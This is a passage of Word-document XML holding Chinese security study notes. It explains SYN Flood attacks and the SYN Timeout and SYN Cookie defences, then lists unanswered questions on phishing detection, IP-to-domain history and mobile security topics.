        </w:rPr>
        <w:t>连接请求而无暇理睬客户的正常请求（毕竟客户端的正常请求比率非常之小），此时从正常客户的角度看来，服务器失去响应，这种情况我们称作：服务器端受到了</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="454545"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>SYN Flood</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="454545"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>攻击（</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="454545"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>SYN</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="454545"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>洪水攻击）。</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="454545"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="454545"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve">　　从防御角度来说，有几种简单的解决方法：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="454545"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="454545"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve">　　第一种是缩短</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="454545"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>SYN Timeout</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="454545"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>时间，由于</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="454545"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>SYN Flood</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="454545"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>攻击的效果取决于服务器上保持的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="454545"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>SYN</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="454545"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>半连接数，这个值</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="454545"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>=SYN</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="454545"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>攻击的频度</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="454545"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve"> x SYN Timeout</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="454545"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>，所以通过缩短从接收到</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="454545"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>SYN</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="454545"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>报文到确定这个报文无效并丢弃改连接的时间，例如设置为</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="454545"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>20</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="454545"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>秒以下（过低的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="454545"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>SYN Timeout</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="454545"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>设置可能会影响客户的正常访问），可以成倍的降低服务器的负荷。</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="454545"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="454545"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve">　　第二种方法是设置</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="454545"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>SYN Cookie</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="454545"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>，就是给每一个请求连接的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="454545"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>IP</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="454545"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>地址分配一个</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="454545"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>Cookie</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="454545"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>，如果短时间内连续受到某个</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="454545"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>IP</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="454545"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>的重复</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="454545"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>SYN</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="454545"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>报文，就认定是受到了攻击，以后从这个</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="454545"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>IP</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="454545"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>地址来的包会被丢弃。</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="454545"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="454545"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve">　　可是上述的两种方法只能对付比较原始的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="454545"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>SYN Flood</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="454545"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>攻击，缩短</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="454545"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>SYN Timeout</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="454545"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>时间仅在对方攻击频度不高的情况下生效，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="454545"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>SYN Cookie</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="454545"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>更依赖于对方使用真实的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="454545"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>IP</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="454545"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>地址，如果攻击者以数万</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="454545"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>/</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="454545"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>秒的速度发送</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="454545"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>SYN</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="454545"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>报文，同时利用</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="454545"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>SOCK_RAW</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="454545"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>随机改写</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="454545"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>IP</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="454545"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>报文中的源地址，以上的方法将毫无用武之地。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000871D4" w:rsidRDefault="000871D4" w:rsidP="000871D4"/>
    <w:p w:rsidR="000871D4" w:rsidRDefault="000871D4" w:rsidP="00DF44AE">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="348" w:lineRule="atLeast"/>
        <w:ind w:firstLineChars="100" w:firstLine="190"/>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑"/>
          <w:color w:val="3E3E3E"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:hint="eastAsia"/>
          <w:color w:val="3E3E3E"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>怎样判断一个网站是否为钓鱼网站？</w:t>
      </w:r>
      <w:r w:rsidR="00DF44AE">
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:hint="eastAsia"/>
          <w:color w:val="3E3E3E"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000871D4" w:rsidRDefault="000871D4" w:rsidP="000871D4">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="348" w:lineRule="atLeast"/>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑"/>
          <w:color w:val="3E3E3E"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:hint="eastAsia"/>
          <w:color w:val="3E3E3E"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve">　　如何获取一个IP地址曾经属于哪些域名？</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000871D4" w:rsidRDefault="000871D4" w:rsidP="002F4167">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="348" w:lineRule="atLeast"/>
        <w:ind w:firstLine="375"/>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑"/>
          <w:color w:val="3E3E3E"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:hint="eastAsia"/>
          <w:color w:val="3E3E3E"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>移动安全包含了什么内容？</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002F4167" w:rsidRDefault="002F4167" w:rsidP="004164D8">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="348" w:lineRule="atLeast"/>
        <w:ind w:firstLineChars="250" w:firstLine="475"/>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑"/>
          <w:color w:val="3E3E3E"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑"/>
          <w:color w:val="3E3E3E"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>W</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:hint="eastAsia"/>
          <w:color w:val="3E3E3E"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>ifi安全</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00492965" w:rsidRDefault="00DF44AE" w:rsidP="00DF44AE">
      <w:pPr>
        <w:pStyle w:val="HTML0"/>
        <w:shd w:val="clear" w:color="auto" w:fill="F3FFEC"/>
        <w:spacing w:after="136" w:line="326" w:lineRule="atLeast"/>
        <w:ind w:firstLineChars="250" w:firstLine="475"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>移动设备的物理安全，用户身份、账户信息</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial" w:hint="eastAsia"/>
          <w:color w:val="333333"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>\SIM</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial" w:hint="eastAsia"/>
          <w:color w:val="333333"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>卡安全</w:t>
      </w:r>
      <w:r w:rsidR="00B04F75">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial" w:hint="eastAsia"/>
          <w:color w:val="333333"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00DF44AE" w:rsidRDefault="00B04F75" w:rsidP="00DF44AE">
      <w:pPr>
        <w:pStyle w:val="HTML0"/>
        <w:shd w:val="clear" w:color="auto" w:fill="F3FFEC"/>
        <w:spacing w:after="136" w:line="326" w:lineRule="atLeast"/>
        <w:ind w:firstLineChars="250" w:firstLine="475"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial" w:hint="eastAsia"/>
          <w:color w:val="333333"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>手机病毒</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002F4167" w:rsidRDefault="008E18A0" w:rsidP="003A0130">
      <w:pPr>
        <w:pStyle w:val="HTML0"/>
        <w:shd w:val="clear" w:color="auto" w:fill="F3FFEC"/>
        <w:spacing w:after="136" w:line="326" w:lineRule="atLeast"/>
        <w:ind w:firstLineChars="250" w:firstLine="475"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>A</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial" w:hint="eastAsia"/>
          <w:color w:val="333333"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>nriod</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial" w:hint="eastAsia"/>
          <w:color w:val="333333"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>系统安全</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="001003DB" w:rsidRPr="00F54421" w:rsidRDefault="001003DB" w:rsidP="001003DB">
      <w:pPr>
        <w:widowControl/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>短信拦截</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="001003DB" w:rsidRDefault="001003DB" w:rsidP="003A0130">
      <w:pPr>
        <w:pStyle w:val="HTML0"/>
        <w:shd w:val="clear" w:color="auto" w:fill="F3FFEC"/>
        <w:spacing w:after="136" w:line="326" w:lineRule="atLeast"/>
        <w:ind w:firstLineChars="250" w:firstLine="475"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00F54421" w:rsidRDefault="00F54421" w:rsidP="00F54421">
      <w:pPr>
        <w:widowControl/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
